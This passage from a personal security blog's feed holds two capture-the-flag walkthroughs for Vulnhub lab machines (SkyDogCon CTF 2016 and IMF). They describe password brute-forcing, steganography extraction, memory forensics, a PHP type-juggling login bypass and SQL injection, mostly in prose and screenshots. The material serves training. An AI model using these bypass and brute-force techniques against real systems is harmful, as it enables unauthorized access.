<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1xlgY1bMZPrdP6MSIRLeLKeWQhXUKdxMOmUFcJH872x41UnAk2KX5nLxcOWe9hC7T-D-am05uBh0Nkpjoj0apUQ2f9dEEshKeRjSyOc0JH13jjxJ7NABAleVoVqo4ISE-nKOuIsSjEVfX/s1600/final_flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1xlgY1bMZPrdP6MSIRLeLKeWQhXUKdxMOmUFcJH872x41UnAk2KX5nLxcOWe9hC7T-D-am05uBh0Nkpjoj0apUQ2f9dEEshKeRjSyOc0JH13jjxJ7NABAleVoVqo4ISE-nKOuIsSjEVfX/s320/final_flag.png" width="320" /></a></div>
<br />
There we go. I hope this helped you out! I realize there are many walkthroughs for this challenge and I hope mine gave you something you might not have received elsewhere while you were learning from this challenge. <b>Full Disclosure: I had issues with meterpreter and getting running the 'shell' command inside of meterpreter because the VM had run out of memory. If you find you're running into a similar issue, try restarting the VM and it should fix that issue.</b><br />
<br />
-Hack Responsibly. Hack Professionally.Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-41193973706944075752016-11-21T15:35:00.001-05:002016-11-21T15:35:11.575-05:00Over 1000 Page Views! This is neither a professional development nor a security related post. I would like to thank everyone that has visited my blog and has benefited from my contributions to the infosec community! I am so excited that my blog has finally reached over 1000 lifetime page views and here is to the next 1000 page views! -Hack Responsibly, Hack ProfessionallyAustinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-60655551668956679862016-11-21T15:27:00.001-05:002016-11-21T15:27:28.602-05:00Vulnhub - SkyDogCon CTF 2016 WalkthroughWelcome back, here's my walkthrough of the SkyDogCon CTF 2016 as posted on Vulnhub. My thoughts and comments are my own and do not represent anyone else's unless explicitly stated. So, without further ado, let's begin.<br />
<br />
Of course, we start out with an nmap scan and get some decent results.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMAfwR-zVmkltLV0ukuRac3YN17rzqC4ACOtbYnO-6LlGjpE_A8o61gu56OB7rGaM4S6ZTrvcbw071NrZpfs7SCW_W5aFLVZd6e2dcyuiPz7_Jlwyjjq-nQv6R63I-Yb4h0LzZ9VZD7YCC/s1600/nmap_all_ports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMAfwR-zVmkltLV0ukuRac3YN17rzqC4ACOtbYnO-6LlGjpE_A8o61gu56OB7rGaM4S6ZTrvcbw071NrZpfs7SCW_W5aFLVZd6e2dcyuiPz7_Jlwyjjq-nQv6R63I-Yb4h0LzZ9VZD7YCC/s320/nmap_all_ports.png" width="320" /></a></div>
<br />
Now, let's check out the web server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAVNytP9_sIfqxzBgS56XJrque1MFfso5ZPsD2sEaKdZQNHzF9FMm8y1oe39mq7E6f5pP73ybi8sGfTP6W6sBNz705V1UYvX1VVktT4Ktxwm2gj6z-iIQ6JhZuOBzrIY7Y8A503CHUDdb/s1600/skydogcon_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAVNytP9_sIfqxzBgS56XJrque1MFfso5ZPsD2sEaKdZQNHzF9FMm8y1oe39mq7E6f5pP73ybi8sGfTP6W6sBNz705V1UYvX1VVktT4Ktxwm2gj6z-iIQ6JhZuOBzrIY7Y8A503CHUDdb/s320/skydogcon_webpage.png" width="320" /></a></div>
Looks pretty cool, one comment jumped out to me so I made note of it and decided to continue on with fuzzing web directories using dirbuster. I found a forbidden directory called /personnel and it accused me of not coming from an FBI workstation...the nerve...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_nvSEMnyU1u05d6-xc05mef5DrztKCXOfzMBbzfrkCDg5BvPknonD10JKHsElrKVN3f-FGkaZMya0FeYumKTLjOayjdYQS7x9VvwZOauTncvcIxdoYozjYTxmmm9RfEixt1YmWZr8GeBE/s1600/not_fbi_workstation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_nvSEMnyU1u05d6-xc05mef5DrztKCXOfzMBbzfrkCDg5BvPknonD10JKHsElrKVN3f-FGkaZMya0FeYumKTLjOayjdYQS7x9VvwZOauTncvcIxdoYozjYTxmmm9RfEixt1YmWZr8GeBE/s320/not_fbi_workstation.png" width="320" /></a></div>
<br />
Nikto didn't return anything useful so, let's check out this comment with a suspicious directory. This looks like a lot of javascript gibberish, but at the very top is a series of letters and numbers. none of the letters are bigger than f so this may be hexadecimal. So, I decode it and it's the first flag!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDbahHmepTcFCLttVLICpMmzyLlLb5GMxsGJLMfZZDO-MzTlB1Kdg00ynas0BM1Ii8qVSpWDWunzJBqKWnrfQWJ7t0-bBcllbfio_xolYwtGqMo0ykwNYN8q3rQ4USeXXJlFT50yjg3Ap/s1600/flag1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDbahHmepTcFCLttVLICpMmzyLlLb5GMxsGJLMfZZDO-MzTlB1Kdg00ynas0BM1Ii8qVSpWDWunzJBqKWnrfQWJ7t0-bBcllbfio_xolYwtGqMo0ykwNYN8q3rQ4USeXXJlFT50yjg3Ap/s320/flag1.png" width="320" /></a></div>
<br />
At this point, I have no other leads to go on for the next flag so, I decide to start investigation the suspicious port I found on my nmap scan. So I connect with ssh and boom! The next flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixMo-doNE9EapPJhzLehSvfmBrJ1XrRCCAG-PZ2lsHiSS5q1N3i5bs01Km0nn0z9g9X1ta1bw9sFgTDqZGAHrzPT9VVp0inp-LhTQL0T3F-91qMPuWv4n21UUqQLEdAoFf-2Zqa8YXzYYN/s1600/flag2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixMo-doNE9EapPJhzLehSvfmBrJ1XrRCCAG-PZ2lsHiSS5q1N3i5bs01Km0nn0z9g9X1ta1bw9sFgTDqZGAHrzPT9VVp0inp-LhTQL0T3F-91qMPuWv4n21UUqQLEdAoFf-2Zqa8YXzYYN/s320/flag2.png" width="320" /></a></div>
<br />
So let's see if we can't crack these two md5 hashes because otherwise I'm not sure what else to do at the moment. The first hash is the hash of the word 'nmap' how convenient, and the second hash is the word 'encrypt'. So I try it as the password and it fails. I then try it as the password for user 'frank' and it fails again. What the hell does 'encrypt' mean? I decided to re-assess every piece of information I had. Port 22 is is closed according to nmap. Port 80 is open and has a webserver. Port 443....is SSL...encrypted! I start immediately going through the webserver. The code is the exact same, so what should I be looking for? What makes SSL encrypted? Well, the encryption keys are stored in private keys and the private key isn't going to be available so the public key must be available and the public key is stored in a certificate! So I pulled up the certificate and holy crap, of course, there is the third flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxastY_Ek5x6DHuNAC57y-6kkXOCoThLQ7N_KmYDysRf9JkiDN8HFIaCzhFIaJhbsshBYDTsfEuVEH6TSg5CeFyKCgYqQ1MqEE_2u6TUXKDG8ljUm304BBQdkzS0rPRIjUhZTiu0fJHvb/s1600/flag3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxastY_Ek5x6DHuNAC57y-6kkXOCoThLQ7N_KmYDysRf9JkiDN8HFIaCzhFIaJhbsshBYDTsfEuVEH6TSg5CeFyKCgYqQ1MqEE_2u6TUXKDG8ljUm304BBQdkzS0rPRIjUhZTiu0fJHvb/s320/flag3.png" width="320" /></a></div>
<br />
After cracking the third flag it says personnel..HEY! We already found that page! So I pull up the personnel page again and reinvestigate it. Nothing on the source code. No cookies are being stored. It must have to do with my IP address, but i'm not sure what is considered an 'FBI' workstation. Man, how many times do I have to feel like I don't have enough information!<br />
<br />
At this point I start clicking through every page I know about searching for 'FBI' and something comes up in the html5.js for temporary support for IE4 Workstations. It's odd that it's specifically IE4, could it be filtering on User-agent string? Let's try. So I found a IE4 user-agent string and added a browser extension to change my user-agent and up came a very different page...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA9uzFQ6uQfW0c666-Gr2WO-rNfVt3HKHIQy9AtuZGuWelKGlcXHB7cy7v6kio4hf0uQ_1o17b6wrBB9Gc56peqRff9pnqq0hzlLc6RB9lo0t-cJedEcw5md-Zh1Dzg2JezXd3d6ghmTkz/s1600/fbi_portal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA9uzFQ6uQfW0c666-Gr2WO-rNfVt3HKHIQy9AtuZGuWelKGlcXHB7cy7v6kio4hf0uQ_1o17b6wrBB9Gc56peqRff9pnqq0hzlLc6RB9lo0t-cJedEcw5md-Zh1Dzg2JezXd3d6ghmTkz/s320/fbi_portal.png" width="320" /></a></div>
<br />
And if you look near the bottom, we get a flag! There is also a clue, "Clue = new+flag". We crack the flag and it's 'evidence'. Ok, i need evidence of whatever 'new evidence' is. So, looking through the webpage, there are certain numbers that are made bold, 'six, one, 7, 4, 6, 8'. Could this be new evidence? A directory doesn't exist with those numbers, let's try using the clue newevidence. Sure enough, I get a authentication required prompt. So I try hanratty:617468. Fail. I spell out the first two numbers. Fail. So, thinking back to doug.perterson from the html5.js, I don't know "Agent Hanratty's" first name, so I google 'hanratty'. At first I see some James Hanratty stuff, but as I scroll down I see 'hanratty catch me if you can'. Seriously? This is some obscure movie reference?? (I personally hate obscure movie references in CTFs because I have seen almost NO popular movies, my fault, still annoying). Things are making more sense now, I've seen the name Frank Abagnale and FBI and I learn that Agent Hanratty's name is Carl. So the username is probably carl.hanratty. I try this with the numbers still to no avail. Come ooonnnnn.<br />
<br />
Now that I know this CTF is based on the movie and the flag name mentions dialogue, I decided to try and make a password list from the script. So I used cewl (which I have a post about on here as well http://professionalhackerdigest.blogspot.com/2016/09/a-pretty-cewl-post.html) to generate a list and decided to use that list with Burp Suite to attempt to brute force the login. This will take a good long while because of the degradation in service that Burp Suite provides as a feature for the free version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-_zxa89aXToHmFADIUg40QziqlwvX88gCiKOIJMFgekVLFRrsJxFM0FSvWXqXPotbg_qFjl9jbtlYgTXKK0yKg95m6_8C0rbpw4vXR4JzQsbEIPfIlPh0lJHs8rg4RqlHIadAvJyg-SeN/s1600/burp_suite_brute_force.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-_zxa89aXToHmFADIUg40QziqlwvX88gCiKOIJMFgekVLFRrsJxFM0FSvWXqXPotbg_qFjl9jbtlYgTXKK0yKg95m6_8C0rbpw4vXR4JzQsbEIPfIlPh0lJHs8rg4RqlHIadAvJyg-SeN/s320/burp_suite_brute_force.png" width="320" /></a></div>
<br />
I had to test the original list and I added all lowercase, all uppercase, and first letter capitalized to finally find the password, "Grace".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhjL1mWWLKEetBZUW4xlQHVvJw1x-iLj7R1DPjHxPtiVO4CBhKna1DShmwvyFIRghWZhjuaV2kueZqqCnwp8wrCa7TrZEZtxc-BLH4RQv0SSif9fzBHrwB8NIyRuoMJ759EFoGXkmTkxf/s1600/newevidence.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhjL1mWWLKEetBZUW4xlQHVvJw1x-iLj7R1DPjHxPtiVO4CBhKna1DShmwvyFIRghWZhjuaV2kueZqqCnwp8wrCa7TrZEZtxc-BLH4RQv0SSif9fzBHrwB8NIyRuoMJ759EFoGXkmTkxf/s320/newevidence.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhkPfEbIWC6LRAzS-JLGb_4GmMbUvsa-D6efvvHu4OovyXtdfHtYqu2KakgxBpFQHTgcMk6PXsGbhRNLUsdHgol77MXFwtobuPcv5-unDaCfHsaSCxwaUuPmeRx0vtzQs_FxEr98ocJCuA/s1600/flag5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhkPfEbIWC6LRAzS-JLGb_4GmMbUvsa-D6efvvHu4OovyXtdfHtYqu2KakgxBpFQHTgcMk6PXsGbhRNLUsdHgol77MXFwtobuPcv5-unDaCfHsaSCxwaUuPmeRx0vtzQs_FxEr98ocJCuA/s320/flag5.png" width="320" /></a></div>
The fifth flag is "panam". There are two more links on this page. One shows an image and the other shows a pdf. The image is a picture of a river and a beach with some people, some houses and a small castle in the background. I downloaded it and ran exiftool against it, but nothing interesting came up. The pdf is an invoice from Hetzl and Associates for "Encryption Consultation Project" done for Agent Earl Amdursky of the FBI and some guy named Stefan Hetzl actually did the work. So after searching for "Stefan Hetzl encryption" on google, the tool StegHide comes up. *Lightbulb* the picture we downloaded has an embedded message with StegHide.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieNb3ziXTizixeAn9KGKIQ0V9WcvSEkNjyupofnCptcjM4dG82LK8-GZgopJplEb6H24SUugRipDx7NKme81I6-kd7hcBsfd1LI13gl7ErE-jA1qG_hESeWv5vp3oqGcTmo3Ms3ywLtkY1/s1600/flag6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieNb3ziXTizixeAn9KGKIQ0V9WcvSEkNjyupofnCptcjM4dG82LK8-GZgopJplEb6H24SUugRipDx7NKme81I6-kd7hcBsfd1LI13gl7ErE-jA1qG_hESeWv5vp3oqGcTmo3Ms3ywLtkY1/s320/flag6.png" width="320" /></a></div>
<br />
As you can see in the picture, I had to download steghide (apt-get install steghide) and then followed the man page to successfully extract the image. The passphrase was the previous flag "panam", makes sense in the context of this CTF. Interestingly enough, the flag is decrypted for us here and it says "ILoveFrance". This looks like a password to me, so i'm going to keep that in mind going forward. There is also a clue "iheartbrenda" all lowercase. Possibly a directory? Nope, not a directory. Neither is "ILoveFrance".<br />
<br />
Ok, so, we now have what looks like a password or maybe two (because we know they're not directories) and the flag title references 'the fastest man alive'. Luckily, i know that's a reference to The Flash (comic book character knowledge ftw) and I decided to go through the script looking for 'fastest man alive' and nothing. So I googled 'fastest man alive the flash' and then it hit me, barry allen, his pseudonym. So I checked the script for 'barry allen'. Again nothing! So, back to the google AGAIN. I searched 'barry allen catch me if you can' and there were numerous references to the movie and Carl is convinced that Frank is named Barry Allen. Could this be a username and could we have a password for the SSH connection we've been waiting for???<br />
<br />
I tried a few combinations of Barry Allen (barry, barry.allen, barryallen) (of course the last one worked) and the password was 'iheartbrenda' instead of the 'ILoveFrance'. Works for me!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha-uI-QbJRaEGN1uczUZfrfKc9w3nxQGNp4JX1ONq-Xbu7X6aTWIlAlSXeTizlw2RvXbXTYELKVy4k0fHnJPOHbij6gQc50UlYgtsGBVAHPUVR82lpI7Tcho3C2vDv1gjzgLPtDdv4pNjG/s1600/ssh_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha-uI-QbJRaEGN1uczUZfrfKc9w3nxQGNp4JX1ONq-Xbu7X6aTWIlAlSXeTizlw2RvXbXTYELKVy4k0fHnJPOHbij6gQc50UlYgtsGBVAHPUVR82lpI7Tcho3C2vDv1gjzgLPtDdv4pNjG/s320/ssh_login.png" width="320" /></a></div>
<br />
The 7th flag is in the home directory as flag.txt and the md5 is 'theflash'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPlhSdJnOFHnOFUZy2fpJXg-hTkS4aO-qIXuPEyFIul4p5oaTIKxYyN2p5WKHdGRQfqUCRCnx6yrqS6Hd61wXa9nfL15pxqKC9HrlA9YwuivPdYWTEdcL3ZECAzVwcbUpOmcKd3iPfaVMu/s1600/flag7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPlhSdJnOFHnOFUZy2fpJXg-hTkS4aO-qIXuPEyFIul4p5oaTIKxYyN2p5WKHdGRQfqUCRCnx6yrqS6Hd61wXa9nfL15pxqKC9HrlA9YwuivPdYWTEdcL3ZECAzVwcbUpOmcKd3iPfaVMu/s320/flag7.png" width="320" /></a></div>
So, there is also a security-system.data file in the home directory. After running file on security-system.data we can see it's a zip archive so, I scp it to my kali box to analyze it further. I am able to unzip and expand it, but now running file on it, it just says it's data. Next, I run strings on it and there seem to be a lot of Windows API calls. As I scroll through the output of strings I see well known outputs from the windows cmd.exe prompt and I realize the file is 1 GB in size and has a lot of windows functionality; this is probably a windows image!<br />
<br />
I'm not great with volatility, but I decide to try my luck and use it to open up this potential windows image. First I run the imageinfo plugin and confirm that it is indeed a windows image. Then I run screenshot and I just barely see something in one of the pictures, it has 'code.txt' open in notepad and a cmd.exe prompt behind it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGi1i3xNFco2lHGRzse-lWVqhTx_ZZDGiWSNQYrt39ScGGBItHXRZqrgvpxcKU-0fCsjQarfnAU7BdLMbO4o_4Fzj6qil76cGtUuQgkzVwKKdELoc8FROdiCsHJ842GsU4528S7TEJ8xrk/s1600/vol_screenshot_code_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGi1i3xNFco2lHGRzse-lWVqhTx_ZZDGiWSNQYrt39ScGGBItHXRZqrgvpxcKU-0fCsjQarfnAU7BdLMbO4o_4Fzj6qil76cGtUuQgkzVwKKdELoc8FROdiCsHJ842GsU4528S7TEJ8xrk/s320/vol_screenshot_code_txt.png" width="320" /></a></div>
<br />
So I immediately start looking for this code.txt and processes with cmd.exe. I found the processes, but I found something better quickly after! There is a notepad plugin for volatility that displays the text from a notepad.exe currently running. It's a series of hex values as you can see below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOcQz0zQ-eq73st1igR3ymYr6d_L_ke20mrEfsdWIJYgP5vreFy1HlwiCPmCUrcEtnHUN0qQEw-pSHrTsw09Np9TNU0sMamlN3u0wpNtuIbSmh_ni44VfUL9Mu9JeDgMcSp5-jukqbnijk/s1600/vol_notepad.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOcQz0zQ-eq73st1igR3ymYr6d_L_ke20mrEfsdWIJYgP5vreFy1HlwiCPmCUrcEtnHUN0qQEw-pSHrTsw09Np9TNU0sMamlN3u0wpNtuIbSmh_ni44VfUL9Mu9JeDgMcSp5-jukqbnijk/s320/vol_notepad.png" width="320" /></a></div>
<br />
xxd wasn't giving me all of the answer, but I knew the answer HAD to be in there so I tried a different hex convertor and sure enough, it prints out the last flag,<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCT8LmrhOxGVLaOu9rYbSThMeaakKBrmcJ_lPwHBgHd6M3ixAGbC_rVV54JGIUbRx8i2k48ShMVl5FI1CrmyCdEguQT3fGkH7QOe1a3ogQPnZ-LBq2SqmsnvFBDTxrAQKoj6V0f2jaETW1/s1600/hex2ascii_flag8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCT8LmrhOxGVLaOu9rYbSThMeaakKBrmcJ_lPwHBgHd6M3ixAGbC_rVV54JGIUbRx8i2k48ShMVl5FI1CrmyCdEguQT3fGkH7QOe1a3ogQPnZ-LBq2SqmsnvFBDTxrAQKoj6V0f2jaETW1/s320/hex2ascii_flag8.png" width="320" /></a></div>
<br />
I would like to thank the author James Bower for creating this awesome CTF and anyone who helped him. I would also like to thank Vulnhub.com for hosting this. I hope you enjoy this walkthrough. -Hack Responsibly, Hack Professionally.Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-72581732719730859122016-11-17T08:22:00.000-05:002016-11-17T08:22:25.244-05:00Vulnhub - IMF WalkthroughWelcome! This is my walkthrough of the IMF challenge hosted on vulnhub.com. The actual url to this exact machine is: https://www.vulnhub.com/entry/imf-1,162/<br />
<br />
And now....onto the walkthrough....<br />
<br />
After loading the image into VirtualBox, it showed up as 192.168.6.101 on my local network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJpIAmdx6Kl1rpAPcPtark5V1Kxv1adW3BDsmAY_QdW3ZdMgPoS1lfX-RBNZUkiEkg65L1ImMzxXPUEsfx5AA44WdL_XWlag6WrPs-qLiGtyl4S8rQrlwkhCN_hW2_SRQDoBV6RkULhPJ/s1600/imf_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJpIAmdx6Kl1rpAPcPtark5V1Kxv1adW3BDsmAY_QdW3ZdMgPoS1lfX-RBNZUkiEkg65L1ImMzxXPUEsfx5AA44WdL_XWlag6WrPs-qLiGtyl4S8rQrlwkhCN_hW2_SRQDoBV6RkULhPJ/s320/imf_webpage.png" width="320" /></a></div>
First, I decided to scroll through the source code on the web pages, which is always a decent first thing to do. Sometimes, it can lead to hidden folders that were simply commented out, potentially interesting folders beyond /images, /css, and /js, or in this case the first flag!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCK3YKkYs1vbNBSny0LwwQWuNV21J1BVStjTa5Z7SHuqI0dvWVmCCpNcXLbv-I3ObpUnaaMGeTYudeXVMsJzzYOUelgAZwToR3PnO3qNaws9NrzP4Qp05ZzwxISnucwC55QGbqoob5R4V/s1600/flag1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCK3YKkYs1vbNBSny0LwwQWuNV21J1BVStjTa5Z7SHuqI0dvWVmCCpNcXLbv-I3ObpUnaaMGeTYudeXVMsJzzYOUelgAZwToR3PnO3qNaws9NrzP4Qp05ZzwxISnucwC55QGbqoob5R4V/s320/flag1.png" width="320" /></a></div>
The flag was base64 encoded and after decoding it using linux-fu (echo <flag> | base64 -d) it read out 'allthefiles' (no quotes). Next, I tried browsing to the /allthefiles folder, but to no avail. Then I ran a dirbuster scan with a wordlist to see if there was a hidden directory I needed to find, but nothing jumped out there either. Then I noticed that there were some javascript files that had names that were base64 encoded so I tried to decode them and got part of flag2 in the output, so I concatenated the files together to create the next flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJE95ikFeExNFQgWvtANv-kXa3DcCJLOAen9bc0RH7dOkyHikb_gZxy8_hfBGXV21Ek4cngFYVXbovbRCF9C2XaGhVt3RI7RztwWu39zA4eZYdkXqlUMFE5E6AdMeCaYWuF2ByWPe75okR/s1600/flag2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJE95ikFeExNFQgWvtANv-kXa3DcCJLOAen9bc0RH7dOkyHikb_gZxy8_hfBGXV21Ek4cngFYVXbovbRCF9C2XaGhVt3RI7RztwWu39zA4eZYdkXqlUMFE5E6AdMeCaYWuF2ByWPe75okR/s320/flag2.png" width="320" /></a></div>
<br />
Now to base64 decode flag2...and we got 'imfadministrator' (no quotes). Again, I tried using the flag as path and this time it got us to a login prompt.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTVTtLTxwRvAlL32dHlsnvJkqgAxHuJfSVul7pgABl405bm0JCfFgqUmMKtaylWAo9865j2VgJURDWEGW3zaZmqG2j8EcERfyx0ndiPPq4f9u0tnKuwRiIGYYm77ly_ajCCf6HkFZ2rQtt/s1600/web_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTVTtLTxwRvAlL32dHlsnvJkqgAxHuJfSVul7pgABl405bm0JCfFgqUmMKtaylWAo9865j2VgJURDWEGW3zaZmqG2j8EcERfyx0ndiPPq4f9u0tnKuwRiIGYYm77ly_ajCCf6HkFZ2rQtt/s320/web_login.png" width="320" /></a></div>
After trying imf:administrator as the first pair of credentials, I saw the response 'Invalid Username' so I tried admin, administrator, root and got the same response. Then I remembered the contacts on the contact.php page. I tried all three usernames (the first part of the email addresses) and rmichaels was the only one that returned 'Invalid Password'. Next, I took a look at the source code and the first thing I saw was a huge comment "<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->" (no quotes). Ok, no SQLi, but onto password guessing!<br />
<br />
After password guessing for awhile (longer than I care to admit) I started googling for things along the lines of 'php password bypass'. Lots of SQLi pages came up but another page came up that said something along the lines of 'PHP password bypass for CTF'. *strokes beard*. After reading about this, apparently PHP does not do well with type conversions when comparing to zero and we can alter the POST request to send an array object instead of a string object for the password field and because of the type conversion issues, the php page will incorrectly allow us access.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiigLSWUafcDStrsawK3cCbV2t9GTEZYDv-MGBow_8wk46GpO6_8WhWnfisKB1K4c6F5FaWEI2djV-XHJ9CHfjH2Fl8lQqP214swXmeirrsW6xFNBNn1bMA4YYc4oWBZ5p3UN7uWMZOWx_w/s1600/burp_suite_php_type_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiigLSWUafcDStrsawK3cCbV2t9GTEZYDv-MGBow_8wk46GpO6_8WhWnfisKB1K4c6F5FaWEI2djV-XHJ9CHfjH2Fl8lQqP214swXmeirrsW6xFNBNn1bMA4YYc4oWBZ5p3UN7uWMZOWx_w/s320/burp_suite_php_type_exploit.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJYDfgTcQC_9mpI8p2d5r01tOhfSFjYnXefFzW9duxYtosnJM46wxrtFUxphqUNYr1T1sjNv506AWsRYt5G1SLgtNPZJaJQTBfgNkSJDDd7AswVz9nMVoXJEkyopZ9GRxyiUbCQKkBzhaM/s1600/flag3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJYDfgTcQC_9mpI8p2d5r01tOhfSFjYnXefFzW9duxYtosnJM46wxrtFUxphqUNYr1T1sjNv506AWsRYt5G1SLgtNPZJaJQTBfgNkSJDDd7AswVz9nMVoXJEkyopZ9GRxyiUbCQKkBzhaM/s320/flag3.png" width="320" /></a></div>
Flag3 simply states 'continueTOcms' so I clicked on the link to continue my adventure. I found the CMS and poked around for a little bit. Nothing interesting in the source, no exploitable LFI that I could see. Then I tried SQLi on the pagename parameter. Bingo! After some initial failures, I finally realized that I wasn't including my PHPSESSID cookie with my sqlmap usage. I finally got my command:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
